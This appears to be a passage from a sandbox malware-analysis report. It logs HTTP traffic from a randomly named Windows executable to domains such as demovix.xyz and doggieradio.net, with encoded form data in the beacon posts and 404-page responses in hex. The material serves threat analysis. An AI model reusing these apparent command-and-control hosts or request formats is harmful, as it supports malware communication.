Content-Type: application/x-www-form-urlencoded
Referer: http://www.doggieradio.net/szy7/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.9 | 60835 | 3.33.130.190 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:34:56.215729952 CEST | 476 | OUT | GET /szy7/?tpTd=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2jiKrkd/jwL9iqNrnd9yIGgMT9MzICA==&WX=rnWllP5PLlhLLtj HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.doggieradio.net
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:34:56.673837900 CEST | 395 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 08 Oct 2024 13:34:56 GMT
Content-Type: text/html
Content-Length: 255
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?tpTd=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2jiKrkd/jwL9iqNrnd9yIGgMT9MzICA==&WX=rnWllP5PLlhLLtj"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.9 | 60836 | 199.192.19.19 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:35:06.768614054 CEST | 728 | OUT | POST /azuc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.demovix.xyz
Origin: http://www.demovix.xyz
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.demovix.xyz/azuc/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=FGuUfug9YyVQ5LsVdZKxELIENKZQdPRnCHLIfSSFxVXOM0+2R4W5CAnMEMVcGeO7QyKW1apqcnRK1gGIe4Mv0Ax8ygpAGG0A5eVTHCvam4E6wyJ5pGkrE7zasfEA8tR5WkxrN4IWGbxG6eLtMFNi6p1ROErHqPYrv7JPIuekTa7svXiH+F+euAepXnNf
Oct 8, 2024 15:35:07.426352024 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 13:35:07 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 16026
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: troke-miterlimit="10" x1="247.95" y1="551.719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miter
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426621914 CEST1236INData Raw: 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: ="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit=
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426654100 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 35 34 39 2e 38 37 39 22 20 63 79 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <c
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426687956 CEST1236INData Raw: 33 63 2d 31 31 2e 30 38 36 2d 32 2e 39 37 32 2d 31 37 2e 36 36 34 2d 31 34 2e 33 36 39 2d 31 34 2e 36 39 32 2d 32 35 2e 34 35 35 6c 31 35 2e 36 39 34 2d 35 38 2e 35 33 37 0a 09 09 09 63 33 2e 38 38 39 2d 31 34 2e 35 30 34 2c 31 38 2e 37 39 39 2d
                                                                                                                                                                                                              Data Ascii: 3c-11.086-2.972-17.664-14.369-14.692-25.455l15.694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.426726103 CEST1236INData Raw: 37 63 35 2e 32 33 34 2d 33 2e 30 33 39 2c 37 2e 37 33 31 2d 38 2e 39 36 36 2c 36 2e 36 37 38 2d 31 34 2e 35 39 34 63 32 2e 33 34 34 2c 31 2e 33 34 33 2c 34 2e 33 38 33 2c 33 2e 32 38 39 2c 35 2e 38 33 37 2c 35 2e 37 39 33 0a 09 09 09 09 63 34 2e
                                                                                                                                                                                                              Data Ascii: 7c5.234-3.039,7.731-8.966,6.678-14.594c2.344,1.343,4.383,3.289,5.837,5.793c4.411,7.596,1.829,17.33-5.767,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.67
                                                                                                                                                                                                              Oct 8, 2024 15:35:07.432147026 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22 0a 09 09 09 09 4d 33 35 33 2e 33 35 31 2c 33 36 35 2e 33 38 37 63 2d 37 2e 39 34 38 2c 31 2e 32 36 33 2d 31 36 2e 32 34 39 2c 30 2e 39
                                                                                                                                                                                                              Data Ascii: stroke-miterlimit="10" d="M353.351,365.387c-7.948,1.263-16.249,0.929-24.48-1.278c-8.232-2.207-15.586-6.07-21.836-11.14c-17.004,4.207-31.269,17.289-36.128,35.411l-1.374,5.123c-7.112,26.525,8.617,53.791,35.13,60.899l0,0


Session ID: 22
Source IP: 192.168.2.9
Source Port: 60837
Destination IP: 199.192.19.198
Destination Port: 80
PID: 1432
Process: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:35:09.594202995 CEST | 752 | OUT | POST /azuc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.demovix.xyz
Origin: http://www.demovix.xyz
Cache-Control: max-age=0
Content-Length: 217
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.demovix.xyz/azuc/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 46 47 75 55 66 75 67 39 59 79 56 51 36 72 38 56 52 61 69 78 47 72 49 62 43 71 5a 51 4c 2f 52 6a 43 48 48 49 66 54 48 4f 77 6a 48 4f 56 56 4f 32 53 35 57 35 44 41 6e 4d 44 38 55 59 4c 2b 4f 6b 51 79 32 65 31 59 74 71 63 6e 31 4b 31 6c 71 49 65 49 77 67 31 51 78 2b 30 67 70 43 49 6d 30 41 35 65 56 54 48 43 37 77 6d 38 6f 36 77 69 5a 35 70 69 51 6b 59 72 7a 5a 37 76 45 41 34 74 51 2b 57 6b 77 45 4e 34 34 73 47 64 74 47 36 61 48 74 4c 57 56 6c 77 70 30 55 44 6b 71 4d 69 39 6c 4a 6f 38 46 30 44 34 66 44 44 38 6a 4e 68 57 43 5a 76 33 33 46 37 58 65 4f 51 41 45 33 30 7a 62 77 39 2b 59 6d 4d 4a 4c 35 35 78 61 4a 34 63 30 38 39 51 3d 3d
Data Ascii: tpTd=FGuUfug9YyVQ6r8VRaixGrIbCqZQL/RjCHHIfTHOwjHOVVO2S5W5DAnMD8UYL+OkQy2e1Ytqcn1K1lqIeIwg1Qx+0gpCIm0A5eVTHC7wm8o6wiZ5piQkYrzZ7vEA4tQ+WkwEN44sGdtG6aHtLWVlwp0UDkqMi9lJo8F0D4fDD8jNhWCZv33F7XeOQAE30zbw9+YmMJL55xaJ4c089Q==
Oct 8, 2024 15:35:10.238828897 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 13:35:10 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 16026
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Oct 8, 2024 15:35:10.238892078 CEST | 1236 | IN | Data Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
Oct 8, 2024 15:35:10.238926888 CEST | 1236 | IN | Data Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
Oct 8, 2024 15:35:10.238961935 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
Oct 8, 2024 15:35:10.239012957 CEST | 1236 | IN | Data Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
Oct 8, 2024 15:35:10.239044905 CEST | 1236 | IN | Data Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 34 37 2e 39 35 22 20 79 31 3d 22 35 35 31 2e 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32
Data Ascii: troke-miterlimit="10" x1="247.95" y1="551.719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miter
Oct 8, 2024 15:35:10.239078999 CEST | 1236 | IN | Data Raw: 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20
Data Ascii: ="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit=
Oct 8, 2024 15:35:10.239109993 CEST | 108 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 35 34 39 2e 38 37 39 22 20 63 79 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620
Oct 8, 2024 15:35:10.239140987 CEST | 1236 | IN | Data Raw: 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22
Data Ascii: " cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.5
Oct 8, 2024 15:35:10.239176989 CEST | 1236 | IN | Data Raw: 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33
Data Ascii: ,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round
Oct 8, 2024 15:35:10.244123936 CEST | 1236 | IN | Data Raw: 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34
Data Ascii: 7,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620"


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              23192.168.2.960838199.192.19.19801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:12.148328066 CEST1765OUTPOST /azuc/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.demovix.xyz
                                                                                                                                                                                                              Origin: http://www.demovix.xyz
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.demovix.xyz/azuc/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 46 47 75 55 66 75 67 39 59 79 56 51 36 72 38 56 52 61 69 78 47 72 49 62 43 71 5a 51 4c 2f 52 6a 43 48 48 49 66 54 48 4f 77 6a 50 4f 56 48 32 32 51 61 4f 35 52 51 6e 4d 41 38 55 62 4c 2b 50 34 51 79 65 61 31 59 78 36 63 6c 64 4b 30 48 69 49 59 37 6f 67 2f 51 78 2b 32 67 70 48 47 47 30 56 35 66 35 58 48 43 72 77 6d 38 6f 36 77 68 78 35 75 32 6b 6b 61 72 7a 61 73 66 45 45 38 74 52 5a 57 67 64 7a 4e 35 4d 38 47 75 31 47 35 2b 72 74 4b 6c 78 6c 38 70 30 61 47 6b 71 66 69 39 70 2f 6f 36 68 53 44 34 43 75 44 37 6e 4e 6a 69 72 34 31 6a 75 62 6e 48 76 7a 47 52 63 38 37 7a 2f 4b 7a 4f 35 59 52 5a 66 2f 6e 78 44 61 74 76 56 72 6c 4f 49 36 55 4c 35 38 6a 67 49 72 56 78 59 5a 6c 6c 77 47 5a 30 53 50 7a 62 56 38 42 4b 4c 7a 37 79 67 51 7a 71 6c 30 74 43 54 47 73 38 79 4c 4d 38 6d 69 48 79 56 57 76 53 6f 77 48 38 73 65 4b 6b 61 78 79 73 73 74 2b 66 78 63 6d 54 72 30 30 78 39 42 6e 58 34 50 2f 2f 39 34 58 2b 63 6c 2f 62 68 6b 74 77 62 39 45 2f 68 54 42 2b 6b 50 56 43 76 57 67 49 43 46 4f 6e 47 50 53 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=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 [TRUNCATED]
Oct 8, 2024 15:35:12.826778889 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 13:35:12 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 16026
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Oct 8, 2024 15:35:12.826798916 CEST | 1236 | IN | Data Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
Oct 8, 2024 15:35:12.826811075 CEST | 1236 | IN | Data Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
Oct 8, 2024 15:35:12.826915026 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
Oct 8, 2024 15:35:12.826931000 CEST | 896 | IN | Data Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
Oct 8, 2024 15:35:12.826945066 CEST | 1236 | IN | Data Raw: 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c
Data Ascii: 295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /
Oct 8, 2024 15:35:12.826956987 CEST | 1236 | IN | Data Raw: 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: 4.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
